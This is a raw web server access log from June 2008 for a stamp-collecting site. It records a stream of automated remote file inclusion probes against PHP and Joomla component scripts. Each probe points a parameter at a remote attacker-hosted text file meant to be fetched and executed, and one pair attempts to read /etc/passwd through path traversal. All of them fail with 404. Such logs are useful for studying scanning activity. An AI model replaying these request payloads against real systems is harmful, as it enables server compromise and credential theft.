202.29.32.2 - - [01/Jun/2008:17:00:00 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:01 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:01 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:02 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:02 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:03 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:03 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:22 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:23 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:00:26 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.142.121.22 - - [01/Jun/2008:17:00:31 -0700] "GET /logs/access_080414.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/Dins/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
194.87.5.70 - - [01/Jun/2008:17:01:25 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.87.5.70 - - [01/Jun/2008:17:01:26 -0700] "GET /newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.89.191.68 - - [01/Jun/2008:17:02:24 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/Dins/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.89.191.68 - - [01/Jun/2008:17:02:24 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/Dins/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:04:18 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
202.29.32.2 - - [01/Jun/2008:17:04:19 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
200.21.104.25 - - [01/Jun/2008:17:05:22 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.21.104.25 - - [01/Jun/2008:17:05:22 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.230.21.32 - - [01/Jun/2008:17:06:03 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
87.230.21.32 - - [01/Jun/2008:17:06:05 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
210.17.246.29 - - [01/Jun/2008:17:06:46 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
75.126.86.186 - - [01/Jun/2008:17:09:17 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.126.86.186 - - [01/Jun/2008:17:09:17 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.126.86.186 - - [01/Jun/2008:17:09:17 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.126.86.186 - - [01/Jun/2008:17:09:24 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.126.86.186 - - [01/Jun/2008:17:09:24 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.126.86.186 - - [01/Jun/2008:17:09:24 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.126.86.186 - - [01/Jun/2008:17:09:35 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.126.86.186 - - [01/Jun/2008:17:09:41 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.32.194.164 - - [01/Jun/2008:17:09:55 -0700] "GET /logs/access_080428.log//tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.32.194.164 - - [01/Jun/2008:17:09:56 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.200.89.107 - - [01/Jun/2008:17:10:10 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
203.200.89.107 - - [01/Jun/2008:17:10:16 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
219.94.133.251 - - [01/Jun/2008:17:13:54 -0700] "GET /index.php?option=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:17:14:57 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:17:14:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:17:16:36 -0700] "GET /logs//inc/formmail.inc.php?script_root=http://test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:17:16:36 -0700] "GET //inc/formmail.inc.php?script_root=http://test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:17:17:16 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:17:17:17 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
211.234.107.233 - - [01/Jun/2008:17:17:47 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.234.107.233 - - [01/Jun/2008:17:17:47 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.234.107.233 - - [01/Jun/2008:17:17:47 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:17:17:49 -0700] "GET /logs//extensions/moblog/moblog_lib.php?basedir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:17:17:49 -0700] "GET //extensions/moblog/moblog_lib.php?basedir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
211.234.107.233 - - [01/Jun/2008:17:17:49 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.234.107.233 - - [01/Jun/2008:17:17:49 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.234.107.233 - - [01/Jun/2008:17:17:50 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.102.54.157 - - [01/Jun/2008:17:18:13 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/Dins/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.102.54.157 - - [01/Jun/2008:17:18:27 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/Dins/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
211.234.107.233 - - [01/Jun/2008:17:19:24 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.234.107.233 - - [01/Jun/2008:17:19:25 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.154.38.121 - - [01/Jun/2008:17:20:32 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.154.38.121 - - [01/Jun/2008:17:20:32 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
219.94.133.251 - - [01/Jun/2008:17:24:29 -0700] "GET /logs/access_080421.log/index.php?option=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
219.94.133.251 - - [01/Jun/2008:17:24:29 -0700] "GET /logs/index.php?option=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.67.24.32 - - [01/Jun/2008:17:26:54 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.mathstamps.com"
80.67.24.32 - - [01/Jun/2008:17:26:54 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:17:26:55 -0700] "GET /logs/access_080512.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:17:26:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:17:26:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:17:28:34 -0700] "GET /logs/access_080421.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
80.32.194.164 - - [01/Jun/2008:17:30:32 -0700] "GET /logs/access_080414.log//tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:17:33:50 -0700] "GET /logs/access_080414.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.102.54.157 - - [01/Jun/2008:17:33:58 -0700] "GET /logs/access_080414.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/Dins/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:17:38:46 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:43:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:43:52 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:43:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:43:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:43:52 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:43:53 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.158.195.132 - - [01/Jun/2008:17:44:02 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.mathstamps.com"
194.158.195.132 - - [01/Jun/2008:17:44:02 -0700] "GET //config/dbutil.bck.php?confdir=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:17:44:04 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:17:44:04 -0700] "GET //config/dbutil.bck.php?confdir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:17:44:09 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:17:44:09 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:17:45:19 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:50:39 -0700] "GET /logs/access_080428.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:50:40 -0700] "GET /logs/access_080428.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:17:51:06 -0700] "GET /logs/access_080428.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:17:52:14 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:17:52:15 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:17:52:15 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:53:25 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:53:25 -0700] "GET //config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:53:25 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.27.110.65 - - [01/Jun/2008:17:53:44 -0700] "GET /logs/access_080428.log//config/dbutil.bck.php?confdir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.200.201.194 - - [01/Jun/2008:17:55:56 -0700] "GET /logs/access_080505.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.200.201.194 - - [01/Jun/2008:17:55:56 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.200.201.194 - - [01/Jun/2008:17:55:56 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:55:59 -0700] "GET //config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:17:57:38 -0700] "GET /logs/access_080505.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:17:57:39 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:17:57:39 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:57:50 -0700] "GET /logs/access_080505.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:57:50 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:57:50 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:57:52 -0700] "GET /logs/access_080505.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:57:52 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:57:52 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.158.195.132 - - [01/Jun/2008:17:59:11 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.mathstamps.com"
194.158.195.132 - - [01/Jun/2008:17:59:11 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:17:59:17 -0700] "GET /logs/access_080428.log//config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:18:03:04 -0700] "GET /logs/access_080428.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.87.179.130 - - [01/Jun/2008:18:04:32 -0700] "GET /logs/access_080428.log//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.87.179.130 - - [01/Jun/2008:18:04:32 -0700] "GET /logs/access_080428.log//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.87.179.130 - - [01/Jun/2008:18:04:34 -0700] "GET //skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.87.179.130 - - [01/Jun/2008:18:04:34 -0700] "GET //skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.87.179.130 - - [01/Jun/2008:18:04:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.87.179.130 - - [01/Jun/2008:18:04:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.154.38.121 - - [01/Jun/2008:18:05:26 -0700] "GET //config/dbutil.bck.php?confdir=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.67.24.32 - - [01/Jun/2008:18:05:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.mathstamps.com"
80.67.24.32 - - [01/Jun/2008:18:05:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.mathstamps.com"
